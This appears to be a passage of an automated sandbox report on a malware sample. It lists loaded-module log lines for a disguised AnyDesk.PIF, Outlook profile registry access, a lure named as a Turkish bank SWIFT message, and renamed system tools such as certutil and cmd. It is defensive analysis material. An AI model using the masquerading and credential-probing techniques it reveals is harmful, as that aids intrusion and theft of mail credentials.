                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                      Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd Static file information: File size 3418572 > 1048576
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 0000001D.00000003.2166396626.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: _.pdb source: Native_neworigin.exe, 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, Native_neworigin.exe, 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdb source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AEF000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311674784.0000000002BB7000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1418076900.0000000021AC0000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1457046440.0000000002BB2000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdb source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 0000001D.00000003.2195638183.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 0000000F.00000002.1459416504.0000000002E1E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B24000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1444995649.00000000023C6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1496446844.0000000020B60000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: Acrobat_SL.pdb source: alg.exe, 0000001D.00000003.1936659520.0000000001550000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000009.00000000.1280279137.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000B.00000000.1285426299.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000002.1306669852.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 0000000D.00000000.1298979747.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000000.1307623271.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000010.00000002.1308916113.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000002.1311273643.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, alpha.exe, 00000011.00000000.1309412413.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp, esentutl.exe, 00000015.00000003.1414346732.0000000005580000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 0000001D.00000003.2580817829.0000000000620000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2598730489.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 0000001D.00000003.2579062872.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 0000001D.00000003.2568619306.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000016.00000003.1418764393.00000000056A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdb source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: easinvoker.pdbH source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 0000001D.00000003.2083482558.0000000000410000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: mavinject32.pdb source: alg.exe, 0000001D.00000003.2690766843.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 0000001D.00000003.2650684922.0000000000610000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: certutil.pdbGCTL source: kn.exe, 0000000C.00000002.1297481760.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000C.00000000.1286664343.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000000.1299867443.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp, kn.exe, 0000000E.00000002.1305778842.00007FF627B5E000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 0000001D.00000003.2392507411.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 0000001D.00000003.2264299191.0000000000460000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 0000001D.00000003.2479887474.0000000000650000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb@@ source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\dbs\el\omr\target\x64\ship\click2run\x-none\IntegratedOffice.pdb source: alg.exe, 0000001D.00000003.2667411347.0000000001490000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: maintenanceservice.pdb` source: alg.exe, 0000001D.00000003.1831857242.00000000016A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 0000001D.00000003.2517364614.0000000000400000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000001B.00000003.1519766371.0000000005E50000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1444838110.0000000005B00000.00000004.00001000.00020000.00000000.sdmp
